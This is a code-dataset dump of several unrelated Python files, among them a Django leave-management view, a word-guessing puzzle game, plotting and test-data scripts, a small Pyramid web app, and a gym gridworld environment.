setattr(next_count, cur_leave_request.leave.type_of_leave,\n next_remaining - days_in_next_year)\n next_count.save()\n self.create_migration(cur_leave_request.leave)\n cur_leave_request.leave.status = 'accepted'\n else:\n cur_leave_request.leave.status = 'rejected'\n\n elif start_date.year + 1 == crr_year and end_date.year + 1 == curr_year:\n count = LeavesCount.objects.get(user=cur_leave_request.applicant, year=curr_year+1)\n\n remain = getattr(count, cur_leave_request.leave.type_of_leave)\n required_leaves = cur_leave_request.leave.count_work_days\n if remain < required_leaves:\n cur_leave_request.leave.status = 'rejected'\n else:\n setattr(count, cur_leave_request.leave.type_of_leave,\n remain - required_leaves)\n count.save()\n self.create_migration(cur_leave_request.leave)\n cur_leave_request.leave.status = 'accepted'\n\n\n cur_leave_request.leave.save()\n cur_leave_request.delete()\n return leave_request\n\n\n\n def process_student_request(self, sanc_auth, leave_request, remark, process):\n\n outcome = 'accepted' if process else 'rejected'\n new_leave_request = LeaveRequest.objects.create(\n applicant = leave_request.applicant,\n requested_from = leave_request.requested_from,\n position = leave_request.position,\n leave = leave_request.leave,\n status = process,\n remark = remark,\n )\n new_leave_request.leave.status = outcome\n new_leave_request.leave.save()\n leave_request.delete()\n return JsonResponse({'response': 'ok'}, status=200)\n\n @transaction.atomic\n def create_migration(self, leave):\n\n if leave.start_date <= datetime.date.today():\n\n if leave.applicant.extrainfo.user_type == 'faculty':\n r1 = Replacement.objects.create(\n replacee = leave.applicant,\n replacer = leave.academic_replacement,\n replacement_type = 'academic',\n )\n LeaveMigration.objects.create(\n replacee = leave.applicant,\n replacer = leave.academic_replacement,\n rep = r1,\n start_date = leave.end_date + datetime.timedelta(days=1),\n type = 'del',\n )\n\n r2 = Replacement.objects.create(\n replacee = leave.applicant,\n replacer = leave.administrative_replacement,\n replacement_type = 'administrative',\n )\n LeaveMigration.objects.create(\n replacee = leave.applicant,\n replacer = leave.administrative_replacement,\n rep = r2,\n start_date = leave.end_date + datetime.timedelta(days=1),\n type = 'del',\n )\n\n else:\n if leave.applicant.extrainfo.user_type == 'faculty':\n LeaveMigration.objects.create(\n type = 'add',\n replacee = leave.applicant,\n replacer = leave.academic_replacement,\n start_date = leave.start_date,\n end_date = leave.end_date,\n replacement_type = 'academic',\n )\n\n LeaveMigration.objects.create(\n type = 'add',\n replacee = leave.applicant,\n replacer = leave.administrative_replacement,\n start_date = leave.start_date,\n end_date = leave.end_date,\n replacement_type = 'administrative',\n )\n\n def is_problematic(self, leave):\n #TODO: Add automatic hadling of outdated or problematic leave requests\n pass\n\nclass GetApplications():\n\n @classmethod\n def get_to_approve(cls, request):\n processed_request_list = LeaveRequest.objects.filter(requested_from=request.user).order_by('-id')\n\n replacements = Replacement.objects.filter(Q(replacer=request.user)\n & Q(replacement_type='administrative'))\n reqs = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user)\n & ~(Q(permission='academic')\n | Q(permission='admin')))\n request_list = [cls.should_forward(request, q_obj) for q_obj in reqs]\n for replacement in replacements:\n replacee = replacement.replacee\n reqs = CurrentLeaveRequest.objects.filter((Q(requested_from=request.user)\n | Q(requested_from=replacee))\n & ~(Q(permission='academic')\n | Q(permission='admin')))\n request_list += [cls.should_forward(request, q_obj) for q_obj in reqs]\n\n\n context = {\n 'processed_request_list': processed_request_list,\n 'request_list': request_list,\n }\n return context\n\n @classmethod\n def get_count(cls, request):\n processed_request_list_exists = LeaveRequest.objects.filter(requested_from=request.user).exists()\n\n if processed_request_list_exists:\n return True\n\n replacements = Replacement.objects.filter(Q(replacer=request.user)\n & Q(replacement_type='administrative'))\n reqs = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user)\n & ~(Q(permission='academic')\n | Q(permission='admin'))).exists()\n if reqs:\n return reqs\n\n for replacement in replacements:\n replacee = replacement.replacee\n reqs = CurrentLeaveRequest.objects.filter((Q(requested_from=request.user)\n | Q(requested_from=replacee))\n & ~(Q(permission='academic')\n | Q(permission='admin'))).exists()\n\n if reqs:\n return True\n\n return False\n\n @classmethod\n def get_reps(cls, request):\n rep_requests = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user) &\n (Q(permission='academic') | Q(permission='admin')))\n return {'rep_requests': rep_requests}\n\n @classmethod\n def should_forward(cls, request, query_obj):\n\n obj = FormData(request, query_obj)\n sanc_auth = query_obj.applicant.extrainfo.sanctioning_authority\n sanc_officer = query_obj.applicant.extrainfo.sanctioning_officer\n type_of_leave = query_obj.leave.type_of_leave\n\n designation = query_obj.requested_from.extrainfo.designation\n if sanc_auth == sanc_officer:\n obj.forward = False\n elif (sanc_auth == designation and type_of_leave not in ['casual', 'restricted']) \\\n and query_obj.permission not in ['academic', 'admin']:\n\n obj.forward = True\n\n else:\n obj.forward = False\n return obj\n\n\n@login_required(login_url='/accounts/login')\ndef generate_pdf(request):\n id = request.GET.get('id', None)\n if not id:\n return Http404\n\n leave = get_object_or_404(Leave, pk=id)\n\n if not leave or leave.applicant != request.user:\n return Http404\n date = datetime.date.today()\n # return render(request, 'fusion/leaveModule0/generatePDF.html', {'leave': leave, 'date': date})\n return render_to_pdf('fusion/leaveModule0/generatePDF.html', {'leave': leave, 'request': request, 'date': date})\n\n\nclass GetLeaves(View):\n\n def get(self, request):\n leave_list = Leave.objects.filter(applicant=request.user).order_by('-id')\n count = len(list(leave_list))\n return render(request, 'leave_application/get_leaves.html', {'leaves':leave_list,\n 'count':count,\n 'title':'Leave',\n 'action':'ViewLeaves'})\n","sub_path":"leave_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"355633745","text":"# author: ZumbiPy\r\n# E-mail: zumbipy@gmail.com\r\n\"\"\"\r\nExercício 11\r\n\"\"\"\r\n\r\n\r\ndef valida_texto(text, max, min):\r\n char_t = len(text)\r\n if char_t >= max or char_t <= min:\r\n return False\r\n else:\r\n return True\r\n","sub_path":"Capitulo_08/exercicio-11.py","file_name":"exercicio-11.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46744872","text":"\n\nfrom xai.brain.wordbase.nouns._frippery import _FRIPPERY\n\n#calss header\nclass _FRIPPERIES(_FRIPPERY, ):\n\tdef __init__(self,): \n\t\t_FRIPPERY.__init__(self)\n\t\tself.name = \"FRIPPERIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frippery\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fripperies.py","file_name":"_fripperies.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"318889391","text":"\"\"\"Phrase Puzzler main program.\"\"\"\n\nimport random\nfrom typing import List\n\nfrom constants import (VOWEL_PRICE, CONSONANT_BONUS, PLAYER_ONE,\n PLAYER_TWO, CONSONANT, VOWEL, SOLVE, QUIT,\n HUMAN, HUMAN_HUMAN, HUMAN_COMPUTER, EASY, HARD,\n ALL_CONSONANTS, ALL_VOWELS,\n PRIORITY_CONSONANTS, HIDDEN)\n\nimport puzzler_functions as pf\n\n\n################################ The Game: #################################\ndef play_game(puzzle: str, puzzles: List[str], game_type: str) -> None:\n \"\"\"Play the game!\"\"\"\n\n view = make_view(puzzle)\n consonants, vowels = ALL_CONSONANTS, ALL_VOWELS\n player_one_score, player_two_score = 0, 0\n current_player = PLAYER_ONE\n\n if game_type == HUMAN_COMPUTER:\n difficulty = select_computer_difficulty()\n\n move = ''\n while not pf.is_game_over(puzzle, view, move):\n score = pf.current_player_score(player_one_score,\n player_two_score,\n current_player)\n num_occurrences = 0\n\n display_move_prompt(current_player, score, view)\n\n if pf.is_human(current_player, game_type):\n (move, guess) = human_move(score, consonants, vowels)\n else:\n (move, guess) = computer_move(view, puzzles, difficulty,\n consonants)\n\n if move == QUIT:\n print('You chose to quit the game!')\n winner = 'No winner'\n\n if move == SOLVE:\n if guess == puzzle:\n score = compute_score(puzzle, view, consonants, score)\n view = puzzle\n winner = current_player\n else:\n print(\"The solution '{}' is incorrect. Keep playing!\"\n .format(guess))\n\n else: # guess vowel or consonant\n view = update_view(puzzle, view, guess)\n num_occurrences = puzzle.count(guess)\n score = pf.calculate_score(score, num_occurrences, move)\n\n consonants = pf.erase(consonants, consonants.find(guess))\n vowels = pf.erase(vowels, vowels.find(guess))\n\n winner = current_player\n\n print(\"{} guesses {}, which occurs {} time(s) in the puzzle.\"\n .format(current_player, guess, num_occurrences))\n print(\"{}'s score is now {}.\".format(current_player, score))\n\n if current_player == PLAYER_ONE:\n player_one_score = score\n else:\n player_two_score = score\n current_player = pf.next_player(\n current_player, num_occurrences, game_type)\n\n # The game is over.\n display_outcome(winner, puzzle, game_type, player_one_score,\n player_two_score)\n\n\ndef update_view(puzzle: str, view: str, guess: str) -> str:\n \"\"\"Return a new view of puzzle: a view in which each occurrence of\n guessed_letter in puzzle is revealed.\n\n >>> update_view('apple', '^^^le', 'a')\n 'a^^le'\n >>> update_view('apple', '^^^le', 'p')\n '^pple'\n >>> update_view('apple', '^^^le', 'z')\n '^^^le'\n\n \"\"\"\n\n new_view = ''\n for index in range(len(puzzle)):\n new_view += pf.update_char_view(puzzle, view, index, guess)\n return new_view\n\n\ndef compute_score(puzzle: str, view: str, unguessed_consonants: str,\n current_score: int) -> int:\n \"\"\"Return the final score, calculated by adding\n constants.CONSONANT_BONUS points to current_score for each\n occurrence of each letter in unguessed_consonants in puzzle that\n appears as consonants.HIDDEN in view.\n\n >>> compute_score('apple pies', '^pple p^es', 'dfkpqstz', 0)\n 0\n >>> compute_score('apple pies', '^^^le ^^e^', 'dfkpqstz', 0)\n 8\n\n \"\"\"\n\n final_score = current_score\n for letter in unguessed_consonants:\n if pf.is_bonus_letter(letter, puzzle, view):\n final_score += CONSONANT_BONUS * puzzle.count(letter)\n return final_score\n\n\n########################## Game Play: Computer Moves #######################\ndef computer_move(view: str, puzzles: List[str], difficulty: str,\n consonants: str) -> (str, str):\n \"\"\"Return the computer's next move:\n (constants.SOLVE, solution-guess) or (constants.CONSONANT, letter-guess)\n\n If difficulty is constants.HARD, the computer chooses to solve if\n at least half of the letters in view are revealed (not\n constants.HIDDEN). Otherwise, the computer opts to guess a\n consonant.\n\n \"\"\"\n\n if pf.computer_chooses_solve(view, difficulty, consonants):\n move = SOLVE\n guess = get_match(view, puzzles)\n print('\\tI choose to solve: {}.'.format(guess))\n else:\n move = CONSONANT\n guess = computer_guess_letter(consonants, difficulty)\n print('\\tI choose to guess letter: {}.'.format(guess))\n return move, guess\n\n\ndef get_match(view: str, puzzles: List[str]) -> str:\n \"\"\"Return a puzzle from puzzles that could be represented by view. If\n no such puzzle exists, return the empty string.\n\n >>> get_match('^^^ ro^k^', ['abc', 'csc rocks', 'math is cool'])\n 'csc rocks'\n >>> get_match('^^^ ro^ks', ['abc', 'csc rocks', 'math is cool'])\n ''\n \"\"\"\n\n for puzzle in puzzles:\n if is_match(puzzle, view):\n return puzzle\n return ''\n\n\ndef is_match(puzzle: str, view: str) -> bool:\n \"\"\"Return True if and only if view is a valid puzzle-view of puzzle.\n\n >>> is_match('', '')\n True\n >>> is_match('a', 'a')\n True\n >>> is_match('bb', 'b^')\n False\n >>> is_match('abcde', 'ab^^e')\n True\n >>> is_match('axyzb', 'ab^^e')\n False\n >>> is_match('abcdefg', 'ab^^e')\n False\n\n \"\"\"\n\n if len(puzzle) != len(view):\n return False\n\n for index in range(len(puzzle)):\n if (puzzle[index] != view[index] and\n not pf.is_hidden(index, puzzle, view)):\n return False\n return True\n\n\ndef computer_guess_letter(consonants: str, difficulty: str) -> str:\n \"\"\"Return a letter from consonants. If difficulty is constants.EASY,\n select the letter randomly. If difficulty is constants.HARD,\n select the first letter from constants.PRIORITY_CONSONANTS that\n occurs in consonants.\n\n len(consonants) > 0;\n at least one character in consonants is in consonants.PRIORITY_CONSONANTS.\n difficulty in (constants.EASY, constants.HARD)\n\n >>> computer_guess_letter('bcdfg', 'H')\n 'd'\n\n \"\"\"\n\n if difficulty == HARD:\n for consonant in PRIORITY_CONSONANTS:\n if consonant in consonants:\n return consonant\n return random.choice(consonants)\n\n\n########################## Game Play: User Interaction: ####################\ndef human_move(player_score: int, consonants: str, vowels: str) -> tuple:\n \"\"\"Ask the user to make a complete move:\n\n 1) Repeatedly ask to choose a move (constants.CONSONANT,\n constants.VOWEL, constants.SOLVE, or constants.QUIT), until a\n valid input is entered.\n\n 2) Upon receiving constants.VOWEL or constants.CONSONANT,\n repeatedly prompt to choose a corresponding letter, until a valid\n input is entered.\n\n 3) Upon receiving constants.SOLVE, prompt for a solution word.\n\n Return the user input guess, or the empty string is the first\n choice was constants.QUIT.\n\n \"\"\"\n\n move = select_move(player_score, consonants, vowels)\n\n if move == QUIT:\n guess = ''\n if move == VOWEL:\n guess = select_letter(vowels)\n if move == CONSONANT:\n guess = select_letter(consonants)\n if move == SOLVE:\n guess = input('Input your solution guess: ')\n\n return (move, guess)\n\n\ndef select_move(score: int, consonants: str, vowels: str) -> str:\n \"\"\"Repeatedly prompt current_player to choose a move until a valid\n selection is made. Return the selected move. Move validity is\n defined by is_valid_move(selected-move-type, score, consonants,\n vowels).\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = make_move_prompt()\n\n move = input(prompt)\n while not is_valid_move(move.strip(), score, consonants, vowels):\n move = input(prompt)\n\n return move.strip()\n\n\ndef select_letter(letters: str) -> str:\n \"\"\"Repeatedly prompt the user for a letter, until a valid input is\n received. Return the letter. Valid options are characters from\n letters.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = 'Choose a letter from [{}]: '.format(\n ','.join(['{}'] * len(letters)))\n valid_options = tuple(letters)\n return prompt_for_selection(prompt, valid_options)\n\n\ndef prompt_for_selection(prompt_format: str, valid_options: tuple) -> str:\n \"\"\"Repeatedly ask the user for a selection, until one of valid_options\n is received. The user prompt is created as\n prompt_format.format(valid_option). Return the user input with\n leading and trailing whitespace removed.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = prompt_format.format(*valid_options)\n\n selection = input(prompt)\n while selection.strip() not in valid_options:\n selection = input('Invalid choice.\\n{}'.format(prompt))\n\n return selection.strip()\n\n\ndef display_move_prompt(current_player: str, player_score: int,\n view: str) -> None:\n \"\"\"Display a prompt for the player to select the next move.\"\"\"\n\n print('=' * 50)\n print('{}, it is your turn. You have {} points.'.format(\n current_player, player_score))\n print('\\n' + view + '\\n')\n\n\ndef make_move_prompt() -> str:\n \"\"\"Return a prompt for the player to select the next move.\"\"\"\n\n prompt = '''Select move type:\n [{}] - Vowel,\n [{}] - Consonant,\n [{}] - Solve,\n [{}] - Quit.\\n'''.format(VOWEL, CONSONANT, SOLVE, QUIT)\n\n return prompt\n\n\ndef is_valid_move(move: str, score: int, consonants: str, vowels: str) -> bool:\n \"\"\"Return whether move is valid. If invalid, print an explanatory\n message. A move is valid when:\n\n 1) move is one of constants.CONSONANT, constants.VOWEL,\n constants.SOLVE, or constants.QUIT;\n\n 2) If move is constants.VOWEL, score is high enough to buy a\n vowel(at least constants.VOWEL_PRICE), and vowels has at least\n one character.\n\n 3) If move is constants.CONSONANT, consonants has at least\n one character.\n\n >>> is_valid_move('X', 0, '', '')\n Valid moves are: C, V, S, and Q.\n False\n >>> is_valid_move('Q', 0, '', '')\n True\n >>> is_valid_move('S', 42, 'bdfrt', 'aeui')\n True\n >>> is_valid_move('C', 2, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n True\n >>> is_valid_move('C', 2, '', 'aeiou')\n You do not have any more consonants to guess!\n False\n >>> is_valid_move('V', 1, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n True\n >>> is_valid_move('V', 0, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n You do not have enough points to reveal a vowel. Vowels cost 1 point(s).\n False\n >>> is_valid_move('V', 42, 'bcdfghjklmnpqstvwxyz', '')\n You do not have any more vowels to guess!\n False\n\n \"\"\"\n\n if move not in (CONSONANT, VOWEL, SOLVE, QUIT):\n print('Valid moves are: {}, {}, {}, and {}.'.format(\n CONSONANT, VOWEL, SOLVE, QUIT))\n return False\n\n if move == VOWEL and score < VOWEL_PRICE:\n print('You do not have enough points to reveal a vowel. '\n 'Vowels cost {} point(s).'.format(VOWEL_PRICE))\n return False\n\n if move == VOWEL and vowels == '':\n print('You do not have any more vowels to guess!')\n return False\n\n if move == CONSONANT and consonants == '':\n print('You do not have any more consonants to guess!')\n return False\n\n return True\n\n\n############################# Game Setup: #############################\ndef select_game_type() -> str:\n \"\"\"Repeatedly prompt the user for game type, until a valid input is\n received. Return the game type. Valid options are constants.HUMAN,\n constants.HUMAN_HUMAN, and constants.HUMAN_COMPUTER.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = '''Choose the game type:\n [{}] - One Player\n [{}] - Human-human\n [{}] - Human-computer\\n'''\n valid_options = HUMAN, HUMAN_HUMAN, HUMAN_COMPUTER\n return prompt_for_selection(prompt, valid_options)\n\n\ndef select_computer_difficulty() -> str:\n \"\"\"Repeatedly prompt the user for computer difficulty, until a valid\n input is received. Return the computer difficulty. Valid options\n are constants.EASY and constants.HARD.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = 'Choose the game difficulty ([{}] - Easy or [{}] - Hard): '\n valid_options = EASY, HARD\n return prompt_for_selection(prompt, valid_options)\n\n\ndef make_view(puzzle: str) -> str:\n \"\"\"Return a string that is based on puzzle, with each alphabetic\n character replaced by the constants.HIDDEN character.\n\n >> > make_view('apple cake is great! #csc108')\n '^^^^^ ^^^^ ^^ ^^^^^! #^^^108'\n >> > make_view('108@#$&')\n '108@#$&'\n\n \"\"\"\n\n view = ''\n for char in puzzle:\n if char.isalpha():\n view = view + HIDDEN\n else:\n view = view + char\n return view\n\n\n############################# Game Over: #############################\ndef display_outcome(winner: str, puzzle: str, game_type: str,\n player_one_score: int, player_two_score: int) -> None:\n \"\"\"Display the outcome of game: who won and what the final scores are.\n \"\"\"\n\n print('And the winner is... {}!'.format(winner))\n print('The solution to this game\\'s puzzle is: {}.'.format(puzzle))\n if pf.is_one_player_game(game_type):\n print('In this game, the player scored {} point(s)'.\n format(player_one_score))\n else:\n print('In this game, {} scored {} and {} scored {} point(s)'.\n format(PLAYER_ONE, player_one_score, PLAYER_TWO,\n player_two_score))\n\n\n############################# The Program: #############################\nif __name__ == '__main__':\n\n import doctest\n doctest.testmod()\n\n DATA_FILE = 'puzzles_small.txt'\n\n PUZZLES = []\n with open(DATA_FILE) as data_file:\n for line in data_file:\n PUZZLES.append(line.lower().strip())\n\n PUZZLE = random.choice(PUZZLES)\n\n print('Welcome to Phrase Puzzler!')\n\n print('***' + PUZZLE + '***')\n\n GAME_TYPE = select_game_type()\n play_game(PUZZLE, PUZZLES, GAME_TYPE)\n","sub_path":"a1/puzzler.py","file_name":"puzzler.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598797378","text":"import random\nn = 10\nm = n**2 - 9\nk = n**2 + n\n\nprint(n) #Dimensión\nprint(\"0.00001\")\nprint(random.randrange(5,n+1)) #numero aleatorio\n\nfor i in range(n):\n endline = \" \" if i != n-1 else \"\\n\"\n print(0,end=endline)\n\nfor i in range(n):\n for j in range(n):\n endline = \" \" if j != n-1 else \"\\n\"\n if i == j:\n print(random.randrange(m,k),end=endline)\n else:\n print(random.randrange(0,n+1),end=endline)\nfor i in range(n):\n endline = \" \" if i != n-1 else \"\"\n print(random.randint(0,2*n),end=endline)\n\n\n\n\n","sub_path":"testcase_maker.py","file_name":"testcase_maker.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"118601523","text":"import numpy as np \nimport matplotlib.pyplot as plt\n\nx = np.linspace(0,5,100)\n\nfig = plt.figure(figsize=(12,6))\nplt.suptitle('Exponential distribution plots',fontsize=14)\n\n##########################################################\n\n# Exponential distribution probability density function\ndef get_density_y(x, RATE):\t\n\treturn RATE*np.exp(-RATE*x)\n\n\nax1 = fig.add_subplot(121,ylim=[0,1.5])\n# Get exponential distribution plot\nax1.plot(x,get_density_y(x, 0.5),'r')\nax1.plot(x,get_density_y(x, 1.5),'b')\n# Preferences of first plot\nax1.grid(axis='both',color='y',linestyle='--',linewidth=1)\nax1.legend([r'$\\lambda=0.5$',r'$\\lambda=1.5$'], fontsize=12)\nax1.set_xlabel('x')\nax1.set_ylabel(r'$P(x)$')\nax1.set_title('Probability density function', fontsize=12)\n\n###########################################################\n\ndef get_cumulative_y(x, RATE):\n\treturn 1-np.exp(-x*RATE)\n\n\nax2 = fig.add_subplot(122)\n# Get exponential distribution plot\nax2.plot(x,get_cumulative_y(x, 0.5),'r')\nax2.plot(x,get_cumulative_y(x, 1.5),'b')\n# Preferences of second plot\nax2.grid(axis='both',color='y',linestyle='--',linewidth=1)\nax2.legend([r'$\\lambda=0.5$',r'$\\lambda=1.5$'], fontsize=12)\nax2.set_xlabel('x')\nax2.set_ylabel(r'$P(X \\leq x)$')\nax2.set_title('Cumulative distribution function', fontsize=12)\n\n############################################################\n\nplt.show()","sub_path":"numpy on python 2.7/dist_exp.py","file_name":"dist_exp.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632004602","text":"from wsgiref.simple_server import make_server\nfrom pyramid.config import Configurator\nfrom pyramid.response import Response\nfrom webob import Request, Response\nfrom jinja2 import Environment, FileSystemLoader\n\nassets = [\n 'app.js',\n 'react.js',\n 'leaflet.js',\n 'D3.js',\n 'moment.js',\n 'math.js',\n 'main.css',\n 'bootstrap.css',\n 'normalize.css',\n]\n\nSTYLES = []\nSCRIPTS = []\n\nfor item in assets:\n itemsplited = item.split('.')\n if itemsplited[1] == 'js':\n SCRIPTS.append(item)\n elif itemsplited[1] == 'css':\n STYLES.append(item)\n\nclass make_wsgi_app(object):\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n response = self.app(environ, start_response).decode()\n\ndef app(request):\n response_code = '200 OK'\n response_type = ('Content-Type', 'text/HTML')\n start_response(response_code, [response_type])\n return ''''''\n\ndef index(request):\n env = Environment(loader=FileSystemLoader('.'))\n template = env.get_template('index.html').render(javascripts=SCRIPTS, styles=STYLES)\n return Response(template)\n\ndef about(request):\n env = Environment(loader=FileSystemLoader('.'))\n template = env.get_template('about/about.html').render(javascripts=SCRIPTS, styles=STYLES)\n return Response(template)\n\nif __name__ == '__main__':\n config = Configurator()\n\n configure.add_route('index', '/index.html')\n config.add_view(index, route_name=\"index\")\n\n # configure.add_route('about', '/about/about.html')\n # config.add_view(about, route_name=\"about\")\n\n app = config.make_wsgi_app()\n make_server('0.0.0.0', 80, app).serve_forever()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225083018","text":"from .base import *\n\nSECRETS = SECRETS_FULL['dev']\n\nDEBUG = True\nWSGI_APPLICATION = 'config.wsgi.dev.application'\nDATABASES = SECRETS['DATABASES']\nALLOWED_HOSTS += [\n '*',\n]\nINSTALLED_APPS += [\n\n]\n\n# Storage\nAWS_STORAGE_BUCKET_NAME = 'wps-instagram-lhy3'\n","sub_path":"app/config/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"588722411","text":"# Author: Yash Shukla\n# Email: yash.shukla@tufts.edu\n\nimport math\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom matplotlib.cm import get_cmap\nimport time\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\n\nclass NovelGridworldV0Env(gym.Env):\n\n def __init__(self, map_width=None, map_height=None, items_id=None, items_quantity=None, goal_env = None, is_final = False):\n # NovelGridworldV7Env attributes\n self.env_name = 'Pick and Place'\n self.map_width = 10\n self.map_height = 10\n self.map = np.zeros((self.map_width, self.map_height), dtype=int) # 2D Map\n self.agent_location = (1, 1) # row, column\n # self.direction_id = {'NORTH': 0, 'SOUTH': 1, 'WEST': 2, 'EAST': 3}\n self.direction_id = {'NORTH': 0}\n self.agent_facing_str = 'NORTH'\n self.agent_facing_id = self.direction_id[self.agent_facing_str]\n self.block_in_front_str = 'air'\n self.block_in_front_id = 0 # air\n self.block_in_front_location = (0, 0) # row, column\n self.items = ['wall', 'cube1', 'cube2', 'cube3']\n self.items_id = self.set_items_id(self.items) # {'crafting_table': 1, 'pogo_stick': 2, ...} # air's ID is 0\n # items_quantity when the episode starts, do not include wall, quantity must be more than 0\n self.items_quantity = {'cube1': 1, 'cube2': 1, 'cube3': 1}\n\n self.available_locations = [] # locations that do not have item placed\n self.not_available_locations = [] # locations that have item placed or are above, below, left, right to an item\n\n # Action Space\n self.action_str = {0: 'Forward', 1: 'Left', 2: 'Right', 3: 'Backward', 4: 'PickUp', 5: 'Drop'}\n self.goal_env = 2\n self.action_space = spaces.Discrete(len(self.action_str))\n self.recipes = {}\n self.last_action = 0 # last actions executed\n self.step_count = 0 # no. of steps taken\n\n # Observation Space\n self.num_beams = 8\n self.max_beam_range = 40\n self.items_lidar = ['wall', 'cube1', 'cube2', 'cube3']\n self.items_id_lidar = self.set_items_id(self.items_lidar)\n self.low = np.array([0] * (len(self.items_lidar) * self.num_beams) + [0]*5 )\n self.high = np.array([self.max_beam_range] * (len(self.items_lidar) * self.num_beams) + [2]*5 ) # maximum 5 trees present in the environment\n self.observation_space = spaces.Box(self.low, self.high, dtype=int)\n\n # Reward\n self.last_reward = 0 # last received reward\n self.last_done = False # last done\n self.reward_done = 1000\n self.reward_break = 30\n self.episode_timesteps = 250\n\n if map_width is not None:\n self.map_width = map_width\n if map_height is not None:\n self.map_height = map_height\n if items_id is not None:\n self.items_id = items_id\n if items_quantity is not None:\n self.items_quantity = items_quantity\n if goal_env is not None:\n self.goal_env = goal_env\n if is_final == True:\n self.reward_break = 10\n\n self.current_pickup_state = 0\n self.current_pickup_item = 0 # 0 for cube1, 1 for cube2, 2 for cube3\n self.dropped_items = 0\n self.cube1_priority = 0\n self.cube2_priority = 0\n\n if self.goal_env == 2:\n assert not self.items_quantity['cube3'] == 0, \"Cannot drop. Insert cube 3\"\n\n def reset(self):\n\n # Variables to reset for each reset:\n self.available_locations = []\n self.not_available_locations = []\n self.last_action = 0 # last actions executed\n self.step_count = 0 # no. of steps taken\n self.last_reward = 0 # last received reward\n self.last_done = False # last done\n\n self.current_pickup_state = 0\n self.current_pickup_item = 0 # 0 for cube1, 1 for cube2, 2 for cube 3\n self.dropped_items = 0\n self.target_dropped_items = self.items_quantity['cube1'] + self.items_quantity['cube2']\n self.release_order = []\n\n self.map = np.zeros((self.map_width - 2, self.map_height - 2), dtype=int) # air=0\n self.map = np.pad(self.map, pad_width=1, mode='constant', constant_values=self.items_id['wall'])\n\n \"\"\"\n available_locations: locations 1 block away from the wall are valid locations to place items and agent\n available_locations: locations that do not have item placed\n \"\"\"\n for r in range(2, self.map_width - 2):\n for c in range(2, self.map_height - 2):\n self.available_locations.append((r, c))\n\n # Agent\n idx = np.random.choice(len(self.available_locations), size=1)[0]\n self.agent_location = self.available_locations[idx]\n\n # Agent facing direction\n self.set_agent_facing(direction_str=np.random.choice(list(self.direction_id.keys()), size=1)[0])\n\n for item, quantity in self.items_quantity.items():\n self.add_item_to_map(item, num_items=quantity)\n\n if self.agent_location not in self.available_locations:\n self.available_locations.append(self.agent_location)\n\n # Update after each reset\n self.items_released = [0,0]\n\n self.target_dropped_items = self.items_quantity['cube1'] + self.items_quantity['cube2']\n if self.items_quantity['cube1'] == 1 and self.items_quantity['cube2'] == 0:\n self.target_release_order = [1]\n self.cube1_priority = 1\n if self.items_quantity['cube1'] == 0 and self.items_quantity['cube2'] == 1:\n self.target_release_order = [2]\n self.cube2_priority = 1\n if self.items_quantity['cube1'] == 1 and self.items_quantity['cube2'] == 1:\n self.target_release_order = [1,2]\n self.cube2_priority = 1\n self.cube1_priority = 2\n\n observation = self.get_observation()\n self.update_block_in_front()\n return observation\n\n def add_item_to_map(self, item, num_items):\n\n item_id = self.items_id[item]\n\n count = 0\n while True:\n if num_items == count:\n break\n assert not len(self.available_locations) < 1, \"Cannot place items, increase map size!\"\n\n idx = np.random.choice(len(self.available_locations), size=1)[0]\n r, c = self.available_locations[idx]\n\n if (r, c) == self.agent_location:\n self.available_locations.pop(idx)\n continue\n\n # If at (r, c) is air, and its North, South, West and East are also air, add item\n if (self.map[r][c]) == 0 and (self.map[r - 1][c] == 0) and (self.map[r + 1][c] == 0) and (\n self.map[r][c - 1] == 0) and (self.map[r][c + 1] == 0):\n self.map[r][c] = item_id\n count += 1\n self.not_available_locations.append(self.available_locations.pop(idx))\n\n def get_lidarSignal(self):\n \"\"\"\n Send several beans (self.num_beams) at equally spaced angles in 360 degrees in front of agent within a range\n For each bean store distance (beam_range) for each item in items_id_lidar if item is found otherwise 0\n and return lidar_signals\n \"\"\"\n\n direction_radian = {'NORTH': np.pi, 'SOUTH': 0, 'WEST': 3 * np.pi / 2, 'EAST': np.pi / 2}\n\n # Shoot beams in 360 degrees in front of agent\n angles_list = np.linspace(direction_radian[self.agent_facing_str] - np.pi,\n direction_radian[self.agent_facing_str] + np.pi,\n self.num_beams + 